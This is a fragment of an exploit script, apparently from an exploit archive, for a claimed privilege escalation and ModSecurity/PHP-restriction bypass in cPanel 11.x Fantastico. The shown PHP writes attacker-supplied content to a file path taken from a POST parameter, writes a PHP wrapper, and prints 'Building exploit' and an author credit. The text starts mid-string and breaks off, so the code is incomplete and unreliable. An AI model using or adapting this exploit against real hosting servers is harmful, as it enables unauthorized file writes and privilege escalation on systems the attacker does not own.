Script : Cpanel 11.x
bug : language.php [edite file]
exploit=Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"
safemode off , mod_security off Disable functions : All NONE ,access root folder
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...
";
echo "coding by Super-Crystal
";
echo "Cleaning up
";
echo "Done!
";
} else {
echo "error : ".php_uname();
}
} else {
?>